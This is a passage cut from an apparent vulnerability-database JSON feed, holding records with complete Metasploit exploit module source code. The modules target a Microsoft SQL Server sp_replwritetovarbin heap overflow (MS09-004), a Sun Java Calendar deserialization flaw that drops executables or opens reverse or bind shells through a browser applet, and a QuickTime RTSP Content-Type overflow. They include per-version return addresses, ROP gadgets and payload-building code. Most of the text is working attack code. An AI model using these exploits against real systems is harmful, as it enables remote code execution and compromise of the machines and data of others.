"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ms08_078_xml_corruption.rb"}, 
{"lastseen": "2019-11-29T11:18:31", "bulletinFamily": "exploit", "description": "A heap-based buffer overflow can occur when calling the undocumented \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database, and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004. Microsoft patched this vulnerability in SP3 for 2005 without any public mention. An authenticated database session is required to access the vulnerable code. That said, it is possible to access the vulnerable code via an SQL injection vulnerability. This exploit smashes several pointers, as shown below. 1\\. pointer to a 32-bit value that is set to 0 2\\. pointer to a 32-bit value that is set to a length influenced by the buffer length. 3\\. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the displacement is 0x10. The address of our buffer is conveniently stored in ecx when this instruction is executed. 4\\. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with a displacement of 4. This pointer is not used by this exploit. This particular exploit replaces the previous dual-method exploit. It uses a technique where the value contained in ecx becomes the stack. From there, return oriented programming is used to normalize the execution state and finally execute the payload via a \"jmp esp\". All addresses used were found within the sqlservr.exe memory space, yielding very reliable code execution using only a single query. NOTE: The MSSQL server service does not automatically restart by default. That said, some exceptions are caught and will not result in terminating the process. If the exploit crashes the service prior to hijacking the stack, it won't die. 
Otherwise, it's a goner.\n", "modified": "2017-09-14T02:03:34", "published": "2009-12-31T16:26:32", "id": "MSF:EXPLOIT/WINDOWS/MSSQL/MS09_004_SP_REPLWRITETOVARBIN", "href": "", "type": "metasploit", "title": "MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::MSSQL\n\n def initialize(info = {})\n\n super(update_info(info,\n 'Name' => 'MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption',\n 'Description' => %q{\n A heap-based buffer overflow can occur when calling the undocumented\n \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n Microsoft patched this vulnerability in SP3 for 2005 without any public\n mention.\n\n An authenticated database session is required to access the vulnerable code.\n That said, it is possible to access the vulnerable code via an SQL injection\n vulnerability.\n\n This exploit smashes several pointers, as shown below.\n\n 1. pointer to a 32-bit value that is set to 0\n 2. pointer to a 32-bit value that is set to a length influenced by the buffer\n length.\n 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n this value is referenced with a displacement of 0x38. For MSSQL 2005, the\n displacement is 0x10. The address of our buffer is conveniently stored in\n ecx when this instruction is executed.\n 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n a displacement of 4. This pointer is not used by this exploit.\n\n This particular exploit replaces the previous dual-method exploit. 
It uses\n a technique where the value contained in ecx becomes the stack. From there,\n return oriented programming is used to normalize the execution state and\n finally execute the payload via a \"jmp esp\". All addresses used were found\n within the sqlservr.exe memory space, yielding very reliable code execution\n using only a single query.\n\n NOTE: The MSSQL server service does not automatically restart by default. That\n said, some exceptions are caught and will not result in terminating the process.\n If the exploit crashes the service prior to hijacking the stack, it won't die.\n Otherwise, it's a goner.\n },\n 'Author' => [ 'jduck' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'OSVDB', '50589' ],\n [ 'CVE', '2008-5416' ],\n [ 'BID', '32710' ],\n [ 'MSB', 'MS09-004' ],\n [ 'EDB', '7501' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => 512,\n 'BadChars' => \"\", # bad bytes get encoded!\n 'PrependEncoder' => \"\\x81\\xc4\\xf0\\xef\\xff\\xff\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Privileged' => true,\n 'Targets' =>\n [\n # auto targeting!\n [ 'Automatic', { } ],\n\n #\n # Individual targets\n #\n [\n # Microsoft SQL Server 2000 - 8.00.194 (Intel X86)\n # Aug 6 2000 00:57:48\n 'MSSQL 2000 / MSDE SP0 (8.00.194)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x00a87f26, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x6900a7, # not directly used - call [ecx+0x08]\n 'Disp' => 0x08, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0041b78f, # xchg ecx,esp / sbb [eax],al / pop esi / ret\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x28, # offset to the new stack!\n 'FixESP' => 0x0071f5fb, # advance esp to next ret (add 
esp,0x20 / ret)\n 'Ret' => 0x0041c9a2 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2000 - 8.00.384 (Intel X86)\n # May 23 2001 00:02:52\n 'MSSQL 2000 / MSDE SP1 (8.00.384)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x00a95b2f, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x4b4f00, # not directly used - call [ecx-0x18]\n 'Disp' => 0x34, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0044d300, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret\n 'Popped' => 0x8, # byte count popped in above (before ret)\n 'Offset' => 0x28, # offset to the new stack!\n 'FixESP' => 0x004a2ce9, # advance esp to next ret (add esp,0x1c / ret)\n 'Ret' => 0x004caa15 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2000 - 8.00.534 (Intel X86)\n # Nov 19 2001 13:23:50\n 'MSSQL 2000 / MSDE SP2 (8.00.534)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x00a64f7e, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x660077, # not directly used - call [ecx-0x18]\n 'Disp' => 0x34, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0054131c, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret\n 'Popped' => 0x8, # byte count popped in above (before ret)\n 'Offset' => 0x28, # offset to the new stack!\n 'FixESP' => 0x005306a0, # advance esp to next ret (add esp,0x1c / ret)\n 'Ret' => 0x004ca984 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2000 - 8.00.760 (Intel X86)\n # Dec 17 2002 14:22:05\n 'MSSQL 2000 / MSDE SP3 (8.00.760)',\n {\n 'Num' => 32, # value for 
\"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x00ac344e, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x490074, # not directly used - call [ecx+0x14]\n 'Disp' => 0x34, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x00454303, # xchg ecx,esp / add [eax],al / add [edi+0x5e],bl / pop ebx / pop ebp / ret\n 'Popped' => 0x8, # byte count popped in above (before ret)\n 'Offset' => 0x28, # offset to the new stack!\n 'FixESP' => 0x00503413, # advance esp to next ret (add esp,0x20 / ret)\n 'Ret' => 0x0043fa97 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)\n # May 3 2005 23:18:38\n 'MSSQL 2000 / MSDE SP4 (8.00.2039)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => -13, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x38, # displacement from call [eax+0x38] crash\n 'Writable' => 0x42b6cfe0, # any writable addr (not even necessary really)\n 'Vtable' => 0x0046592e, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x69f5e8, # not directly used - call [ecx+0x14]\n 'Disp' => 0x14, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x007b39a8, # push ecx / pop esp / mov ax,[eax+0x18] / mov [ecx+0x62],ax / pop ebp / ret 0x4\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x20, # offset to the new stack!\n 'FixESP' => 0x00b3694d, # advance esp to next ret (add esp,0x20 / ret)\n 'Ret' => 0x0047c89d # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)\n # Oct 14 2005 00:33:37\n 'MSSQL 2005 SP0 (9.00.1399.06)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => 63, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash\n 'Writable' => 0x53ad5330, # any writable addr (not 
even necessary really)\n 'Vtable' => 0x02201ca8, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x10e860f, # not directly used - call [ecx+0x14]\n 'Disp' => 0x50, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0181c0d4, # push ecx / pop esp / pop ebp / ret\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x20, # offset to the new stack!\n 'FixESP' => 0x0147deb7, # advance esp to next ret (add esp,0x10 / ret)\n 'Ret' => 0x0112c2c7 # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2005 - 9.00.2047.00 (Intel X86)\n # Apr 14 2006 01:12:25\n 'MSSQL 2005 SP1 (9.00.2047.00)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => 63, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash\n 'Writable' => 0x53ad5330, # any writable addr (not even necessary really)\n 'Vtable' => 0x0244c803, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x17139e9, # not directly used - call [ecx+0x14]\n 'Disp' => 0x52, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x0183bf9c, # push ecx / pop esp / pop ebp / ret\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x20, # offset to the new stack!\n 'FixESP' => 0x014923c1, # advance esp to next ret (add esp,0x10 / ret)\n 'Ret' => 0x011b204c # jmp esp\n },\n ],\n\n [\n # Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)\n # Feb 9 2007 22:47:07\n 'MSSQL 2005 SP2 (9.00.3042.00)',\n {\n 'Num' => 32, # value for \"start_offset\"\n 'VtOff' => 63, # offset from 'Num' to smashed vtable ptr\n 'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash\n 'Writable' => 0x53ad5330, # any writable addr (not even necessary really)\n 'Vtable' => 0x027fca52, # becomes eax for [eax+0x38] (must be valid to exec)\n 'FixDisp' => 0x1106d6b, # not directly used - call [ecx+0x14]\n 'Disp' => 0x52, # displacement on call [ecx+disp] used\n 'ecx2esp' => 0x01849641, # push ecx / 
pop esp / pop ebp / ret\n 'Popped' => 0x4, # byte count popped in above (before ret)\n 'Offset' => 0x20, # offset to the new stack!\n 'FixESP' => 0x01498b22, # advance esp to next ret (add esp,0x10 / ret)\n 'Ret' => 0x010a5379 # jmp esp\n },\n ],\n\n [ 'CRASHER', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 09 2008'\n ))\n\n end\n\n def check\n # the ping to port 1434 method has two drawbacks...\n # #1, it doesn't work on mssql 2005 or newer (localhost only listening)\n # #2, it doesn't give an accurate version number (sp/os)\n\n # since we need to have credentials for this vuln, we just login and run a query\n # to get the version information\n if not (version = mssql_query_version())\n return Exploit::CheckCode::Safe\n end\n print_status(\"@@version returned:\\n\\t\" + version)\n\n # Any others?\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.194/)\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.384/)\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.534/)\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.760/)\n return Exploit::CheckCode::Appears if (version =~ /8\\.00\\.2039/)\n return Exploit::CheckCode::Appears if (version =~ /9\\.00\\.1399\\.06/)\n return Exploit::CheckCode::Appears if (version =~ /9\\.00\\.2047\\.00/)\n return Exploit::CheckCode::Appears if (version =~ /9\\.00\\.3042\\.00/)\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n\n mytarget = nil\n if target.name =~ /Automatic/\n print_status(\"Attempting automatic target detection...\")\n\n version = mssql_query_version\n fail_with(Failure::NoAccess, \"Unable to retrieve version information\") if not version\n\n if (version =~ /8\\.00\\.194/)\n mytarget = targets[1]\n elsif (version =~ /8\\.00\\.384/)\n mytarget = targets[2]\n elsif (version =~ /8\\.00\\.534/)\n mytarget = targets[3]\n elsif (version =~ /8\\.00\\.760/)\n mytarget = targets[4]\n elsif (version =~ /8\\.00\\.2039/)\n mytarget = targets[5]\n elsif (version 
=~ /9\\.00\\.1399\\.06/)\n mytarget = targets[6]\n elsif (version =~ /9\\.00\\.2047\\.00/)\n mytarget = targets[7]\n elsif (version =~ /9\\.00\\.3042\\.00/)\n mytarget = targets[8]\n end\n\n if mytarget.nil?\n fail_with(Failure::NoTarget, \"Unable to determine target\")\n else\n print_status(\"Automatically detected target \\\"#{mytarget.name}\\\"\")\n end\n else\n mytarget = target\n end\n\n sqlquery = %Q|declare @i int,@z nvarchar(4000)\nset @z='declare @e int,@b varbinary,@l int;'\nset @z=@z+'exec sp_replwritetovarbin %NUM%,@e out,@b out,@l out,''%STUFF%'',@l,@l,@l,@l,@l,@l,@l,@l'\nexec sp_executesql @z|\n\n # just crash it with a pattern buffer if the CRASHER target is selected..\n if mytarget.name == 'CRASHER'\n sploit = Rex::Text.pattern_create(2048)\n print_status(\"Attempting to corrupt memory to cause an exception!\")\n num = 32\n else\n # trigger the memory corruption\n num = mytarget['Num']\n vt_off = mytarget['VtOff']\n vt_disp = mytarget['VtDisp']\n vtable = mytarget['Vtable']\n ecx_disp = mytarget['Disp']\n esp_off = mytarget['Offset']\n hijack_esp = mytarget['ecx2esp']\n first_esp = mytarget['Popped']\n fix_esp = mytarget['FixESP']\n writable = mytarget['Writable']\n corruptable_bytes = 0x44\n\n # make sploit buff\n sz = (num + vt_off) + esp_off + (2 + corruptable_bytes) + payload.encoded.length\n #sploit = Rex::Text.pattern_create(sz)\n sploit = rand_text_alphanumeric(sz)\n\n # remove displacement! 
(using call [ecx+displacement])\n vtable_off = (num + vt_off)\n sploit[vtable_off,4] = [(vtable - vt_disp)].pack('V')\n\n # stack -> heap\n hijack_off = vtable_off + ecx_disp\n sploit[hijack_off,4] = [hijack_esp].pack('V')\n # becomes eax on mssql 2ksp4 (prevent crash)\n sploit[(vtable_off-4),4] = [writable].pack('V')\n\n # becomes eip after esp hijack\n fixesp_off = vtable_off + first_esp\n sploit[fixesp_off,4] = [fix_esp].pack('V')\n\n # rest of magic stack (disable DEP?)\n stack_off = vtable_off + esp_off\n stack = []\n stack << mytarget['Ret']\n stack = stack.pack('V*')\n # jump over the stuff that gets corrupted\n stack << \"\\xeb\" + [corruptable_bytes].pack('C')\n stack << rand_text_alphanumeric(corruptable_bytes)\n stack << payload.encoded\n sploit[stack_off,stack.length] = stack\n\n # this has to be put in after the stack area since the ptr for sql2k sp1 is in the corrupted stuff\n sploit[hijack_off,4] = [hijack_esp].pack('V')\n\n print_status(\"Redirecting flow to %#x via call to our faked vtable ptr @ %#x\" % [mytarget['FixDisp'], vtable])\n end\n\n # encode chars that get modified\n enc = mssql_encode_string(sploit)\n\n # put the number in (start offset)\n runme = sqlquery.gsub(/%NUM%/, num.to_s)\n runme.gsub!(/%STUFF%/, enc)\n\n # go!\n if !mssql_login_datastore\n fail_with(Failure::NoAccess, \"Unable to log in!\")\n end\n begin\n mssql_query(runme, datastore['VERBOSE'])\n rescue ::Errno::ECONNRESET, EOFError\n print_error(\"Error: #{$!}\")\n end\n\n handler\n disconnect\n end\n\n\n def mssql_str_to_chars(str)\n ret = \"\"\n str.unpack('C*').each do |ch|\n ret += \"+\" if ret.length > 0\n ret += \"char(\"\n ret << ch.to_s\n ret += \")\"\n end\n return ret\n end\n\n\n def mssql_encode_string(str)\n badchars = \"\\x00\\x80\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8e\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9e\\x9f\"\n\n enc = \"\"\n in_str = true\n str.unpack('C*').each do |ch|\n # double-double single quotes\n if ch 
== 0x27\n if not in_str\n enc << \"+'\"\n in_str = true\n end\n enc << ch.chr * 4\n next\n end\n\n # double backslashes\n if ch == 0x5c\n if not in_str\n enc << \"+'\"\n in_str = true\n end\n enc << ch.chr * 2\n next\n end\n\n # convert any bad stuff to char(0xXX)\n if ((idx = badchars.index(ch.chr)))\n enc << \"'\" if in_str\n enc << \"+char(0x%x)\" % ch\n in_str = false\n else\n enc << \"+'\" if not in_str\n enc << ch.chr\n in_str = true\n end\n end\n enc << \"+'\" if not in_str\n return enc\n end\n\n\n def mssql_query_version\n begin\n logged_in = mssql_login_datastore\n rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EINTR\n return nil\n end\n\n if !logged_in\n fail_with(Failure::NoAccess, \"Invalid SQL Server credentials\")\n end\n res = mssql_query(\"select @@version\", datastore['VERBOSE'])\n disconnect\n\n return nil if not res\n if res[:errors] and not res[:errors].empty?\n errstr = \"\"\n res[:errors].each do |err|\n errstr << err\n end\n fail_with(Failure::Unknown, errstr)\n end\n\n if not res[:rows] or res[:rows].empty?\n return nil\n end\n\n return res[:rows][0][0]\n end\nend\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb"}, {"lastseen": "2019-11-20T23:08:24", "bulletinFamily": "exploit", "description": "This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM. The payload can be either a native payload which is generated as an executable and dropped/executed on the target or a shell from within the Java applet in the target browser. 
The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).\n", "modified": "2017-07-24T13:26:21", "published": "2009-12-06T05:50:37", "id": "MSF:EXPLOIT/MULTI/BROWSER/JAVA_CALENDAR_DESERIALIZE", "href": "", "type": "metasploit", "title": "Sun Java Calendar Deserialization Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n\n # Superceded by java_atomicreferencearray\n # include Msf::Exploit::Remote::BrowserAutopwn\n # autopwn_info({ :javascript => false })\n\n def initialize(info = {})\n super(\n update_info(info,\n 'Name' => 'Sun Java Calendar Deserialization Privilege Escalation',\n 'Description' => %q{\n This module exploits a flaw in the deserialization of Calendar objects in the Sun JVM.\n\n The payload can be either a native payload which is generated as an executable and\n dropped/executed on the target or a shell from within the Java applet in the target browser.\n\n The affected Java versions are JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16\n and earlier, SDK and JRE 1.4.2_18 and earlier (SDK and JRE 1.3.1 are not affected).\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'sf', 'hdm' ],\n 'References' =>\n [\n [ 'CVE', '2008-5353' ],\n [ 'OSVDB', '50500'],\n [ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2008/12/calendar-bug.html' ],\n [ 'URL', 'http://landonf.bikemonkey.org/code/macosx/CVE-2008-5353.20090519.html' ],\n [ 'URL', 'http://blog.cr0.org/2009/05/write-once-own-everyone.html' ]\n ],\n 'Platform' => %w(linux osx solaris win),\n 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\n 'Targets' =>\n 
[\n [ 'Generic (Java Payload)',\n {\n 'Platform' => ['java'],\n 'Arch' => ARCH_JAVA\n }\n ],\n [ 'Windows x86 (Native Payload)',\n {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86\n }\n ],\n [ 'Mac OS X PPC (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_PPC\n }\n ],\n [ 'Mac OS X x86 (Native Payload)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X86\n }\n ],\n [ 'Linux x86 (Native Payload)',\n {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 03 2008'\n )\n )\n end\n\n def exploit\n # load the static jar file\n path = File.join(Msf::Config.data_directory, \"exploits\", \"CVE-2008-5353.jar\")\n fd = File.open(path, \"rb\")\n @jar_data = fd.read(fd.stat.size)\n fd.close\n\n super\n end\n\n def on_request_uri(cli, request)\n data = nil\n host = nil\n port = nil\n\n if !request.uri.match(/\\.jar$/i)\n if !request.uri.match(/\\/$/)\n send_redirect(cli, get_resource + '/', '')\n return\n end\n\n print_status(\"#{name} handling request\")\n\n payload = regenerate_payload(cli)\n if !payload\n print_error(\"Failed to generate the payload.\")\n return\n end\n\n if target.name == 'Generic (Java Payload)'\n if datastore['LHOST']\n jar = payload.encoded\n host = datastore['LHOST']\n port = datastore['LPORT']\n print_status(\"Payload will be a Java reverse shell\")\n else\n port = datastore['LPORT']\n host = cli.peerhost\n print_status(\"Payload will be a Java bind shell\")\n end\n if jar\n print_status(\"Generated jar to drop (#{jar.length} bytes).\")\n jar = Rex::Text.to_hex(jar, prefix = \"\")\n else\n print_error(\"Failed to generate the executable.\")\n return\n end\n else\n\n # NOTE: The EXE mixin automagically handles detection of arch/platform\n data = generate_payload_exe\n\n print_status(\"Generated executable to drop (#{data.length} bytes).\")\n data = Rex::Text.to_hex(data, prefix = \"\")\n\n end\n\n send_response_html(cli, generate_html(data, jar, host, port), 'Content-Type' => 'text/html')\n 
return\n end\n\n print_status(\"Sending Applet.jar\")\n send_response(cli, generate_jar, 'Content-Type' => \"application/octet-stream\")\n\n handler(cli)\n end\n\n def generate_html(data, jar, host, port)\n html = \"<html><head><title>Loading, Please Wait...</title></head>\"\n html += \"<body><center><p>Loading, Please Wait...</p></center>\"\n html += \"<applet archive=\\\"Applet.jar\\\" code=\\\"msf.x.AppletX.class\\\" width=\\\"1\\\" height=\\\"1\\\">\"\n html += \"<param name=\\\"data\\\" value=\\\"#{data}\\\"/>\" if data\n html += \"<param name=\\\"jar\\\" value=\\\"#{jar}\\\"/>\" if jar\n html += \"<param name=\\\"lhost\\\" value=\\\"#{host}\\\"/>\" if host\n html += \"<param name=\\\"lport\\\" value=\\\"#{port}\\\"/>\" if port\n html += \"</applet></body></html>\"\n html\n end\n\n def generate_jar\n @jar_data\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/java_calendar_deserialize.rb"}, {"lastseen": "2019-11-22T01:03:27", "bulletinFamily": "exploit", "description": "No module description\n", "modified": "2017-07-24T13:26:21", "published": "2009-03-18T23:28:24", "id": "MSF:EXPLOIT/OSX/RTSP/QUICKTIME_RTSP_CONTENT_TYPE", "href": "", "type": "metasploit", "title": "MacOS X QuickTime RTSP Content-Type Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::TcpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow',\n # Description?\n 'Author' => 'unknown',\n 'Platform' => 'osx',\n 'References' =>\n [\n [ 'CVE', '2007-6166' ],\n [ 'OSVDB', '40876'],\n [ 'BID', '26549' ],\n ],\n 'Payload' =>\n {\n 'Space' => 3841,\n 'BadChars' => 
\"\\x00\\x0a\\x0d\",\n 'MaxNops' => 0,\n 'StackAdjustment' => -3500,\n },\n 'Targets' =>\n [\n [ 'Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0',\n {\n 'Arch' => ARCH_PPC,\n 'Ret' => 0x8fe3f88c,\n 'RetOffset' => 551,\n 'PayloadOffset' => 879\n }\n ],\n\n [ 'Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1',\n {\n 'Arch' => ARCH_PPC,\n 'Ret' => 0x8fe042e0,\n 'RetOffset' => 615,\n 'PayloadOffset' => 3351\n }\n ],\n\n [ 'Mac OS X 10.4.8 x86, QuickTime 7.1.3',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 307,\n 'Writable' => 0xa0bd0f10, # libSystem __IMPORT\n # The rest of these are all in libSystem __TEXT\n 'ret' => 0x9015d336,\n 'poppopret' => 0x9015d334,\n 'setjmp' => 0x900bc438,\n 'strdup' => 0x90012f40,\n 'jmp_eax' => 0x9014a77f\n }\n ],\n\n [ 'Mac OS X 10.5.0 x86, QuickTime 7.2.1',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 307,\n 'Writable' => 0x8fe66448, # dyld __IMPORT\n # The rest of these addresses are in dyld __TEXT\n 'ret' => 0x8fe1ceee,\n 'poppopret' => 0x8fe220d7,\n 'setjmp' => 0x8fe1ceb0,\n 'strdup' => 0x8fe1cd77,\n 'jmp_eax' => 0x8fe01041\n }\n ],\n\n ],\n 'DefaultTarget' => 2,\n 'DisclosureDate' => 'Nov 23 2007'))\n end\n\n ######\n # XXX: This does not work on Tiger apparently\n def make_exec_payload_from_heap_stub()\n frag0 =\n \"\\x90\" + # nop\n \"\\x58\" + # pop eax\n \"\\x61\" + # popa\n \"\\xc3\" # ret\n\n frag1 =\n \"\\x90\" + # nop\n \"\\x58\" + # pop eax\n \"\\x89\\xe0\" + # mov eax, esp\n \"\\x83\\xc0\\x0c\" + # add eax, byte +0xc\n \"\\x89\\x44\\x24\\x08\" + # mov [esp+0x8], eax\n \"\\xc3\" # ret\n\n setjmp = target['setjmp']\n writable = target['Writable']\n strdup = target['strdup']\n jmp_eax = target['jmp_eax']\n\n exec_payload_from_heap_stub =\n frag0 +\n [setjmp].pack('V') +\n [writable + 32, writable].pack(\"V2\") +\n frag1 +\n \"X\" * 20 +\n [setjmp].pack('V') +\n [writable + 24, writable, strdup, jmp_eax].pack(\"V4\") +\n \"X\" * 4\n end\n\n def on_client_connect(client)\n print_status(\"Got client connection...\")\n\n if (target['Arch'] == ARCH_PPC)\n 
ret_offset = target['RetOffset']\n payload_offset = target['PayloadOffset']\n\n # Create pattern sized up to payload, since it always follows\n # the return address.\n boom = Rex::Text.pattern_create(payload_offset)\n\n boom[ret_offset, 4] = [target['Ret']].pack('N')\n boom[payload_offset, payload.encoded.length] = payload.encoded\n else\n boom = Rex::Text.pattern_create(327)\n\n boom[307, 4] = [target['ret']].pack('V')\n boom[311, 4] = [target['ret']].pack('V')\n boom[315, 4] = [target['poppopret']].pack('V')\n boom[319, 4] = [target['Writable']].pack('V')\n boom[323, 4] = [target['Writable']].pack('V')\n\n #\n # Create exec-payload-from-heap-stub, but split it in two.\n # The first word must be placed as the overwritten saved ebp\n # in the attack string. The rest is placed after the\n # Writable memory addresses.\n #\n magic = make_exec_payload_from_heap_stub()\n boom[303, 4] = magic[0, 4]\n boom += magic[4..-1]\n\n #\n # Place the payload immediately after the stub as it expects\n #\n boom += payload.encoded\n end\n\n body = \" \"\n header =\n \"RTSP/1.0 200 OK\\r\\n\"+\n \"CSeq: 1\\r\\n\"+\n \"Content-Type: #{boom}\\r\\n\"+\n \"Content-Length: #{body.length}\\r\\n\\r\\n\"\n\n print_status(\"Sending RTSP response...\")\n client.put(header + body)\n\n print_status(\"Sleeping...\")\n select(nil,nil,nil,1)\n\n print_status(\"Starting handler...\")\n handler(client)\n\n print_status(\"Closing client...\")\n service.close_client(client)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb"}], "zdt": [{"lastseen": "2018-04-05T01:37:00", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category local exploits", "modified": "2009-12-03T00:00:00", "published": "2009-12-03T00:00:00", "id": "1337DAY-ID-8172", "href": "https://0day.today/exploit/description/8172", "type": "zdt", "title": 
